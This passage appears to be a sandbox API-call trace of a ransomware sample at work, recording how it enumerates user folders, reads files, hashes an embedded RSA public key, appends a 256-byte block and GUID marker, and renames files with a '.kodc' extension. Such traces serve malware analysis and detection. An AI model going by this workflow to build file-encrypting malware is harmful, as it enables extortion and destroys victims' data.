returned 0x32cec60 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f38 [0100.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f50 [0100.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f20 [0100.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.971] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.972] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5be6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.972] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.972] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.972] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.972] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.972] CloseHandle (hObject=0x5cc) returned 1 [0100.973] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\qdLGdkG.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\qdlgdkg.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\qdLGdkG.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\qdlgdkg.gif.kodc")) returned 1 [0100.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.974] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0100.975] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117779f0, ftCreationTime.dwHighDateTime=0x1d5b5ad, ftLastAccessTime.dwLowDateTime=0x45bfd5f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ef, ftLastWriteTime.dwLowDateTime=0x45bfd5f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x148b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rUjsNXVZqyJ.ots", cAlternateFileName="RUJSNX~1.OTS")) returned 1 [0100.975] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\rUjsNXVZqyJ.ots") returned=".ots" [0100.975] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\rUjsNXVZqyJ.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\rujsnxvzqyj.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.976] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=5259) returned 1 [0100.976] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.979] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1465, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.979] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.980] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.980] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x148b, lpOverlapped=0x0) returned 1 [0100.980] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.980] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.980] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.980] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0100.981] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.981] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.981] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.981] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.981] GetLastError () returned 0x0 [0100.981] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.981] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0100.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.981] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.981] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.981] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1490) returned 0x9ba8d90 [0100.982] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5d28 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f08 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5d70 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f20 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f50 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f68 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.982] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f50 | out: hHeap=0x630000) returned 1 [0100.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f68 | out: hHeap=0x630000) returned 1 [0100.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f68 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7f50 [0100.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f68 | out: hHeap=0x630000) returned 1 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f50 | out: hHeap=0x630000) returned 1 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.983] GetCurrentThreadId () returned 0x42c [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7bb8 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.983] GetCurrentThreadId () returned 0x42c [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f50 [0100.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f68 [0100.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f38 [0100.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f80 [0100.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0100.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.985] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x148b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.985] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.986] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.986] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.986] CloseHandle (hObject=0x5cc) returned 1 [0100.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.987] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\rUjsNXVZqyJ.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\rujsnxvzqyj.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pwaY\\rUjsNXVZqyJ.ots.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pway\\rujsnxvzqyj.ots.kodc")) returned 1 [0100.988] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117779f0, ftCreationTime.dwHighDateTime=0x1d5b5ad, ftLastAccessTime.dwLowDateTime=0x45bfd5f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ef, ftLastWriteTime.dwLowDateTime=0x45bfd5f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x148b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rUjsNXVZqyJ.ots", cAlternateFileName="RUJSNX~1.OTS")) returned 0 [0100.989] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0100.989] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0100.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0100.989] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0100.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.989] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0100.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.989] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0100.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5d70 [0100.989] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0100.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0100.989] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0100.989] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0100.989] PathFindFileNameW (pszPath="") returned="" [0100.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.989] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117779f0, ftCreationTime.dwHighDateTime=0x1d5b5ad, ftLastAccessTime.dwLowDateTime=0x45bfd5f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ef, ftLastWriteTime.dwLowDateTime=0x45bfd5f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x148b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rUjsNXVZqyJ.ots", cAlternateFileName="RUJSNX~1.OTS")) returned 0xffffffff [0100.990] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 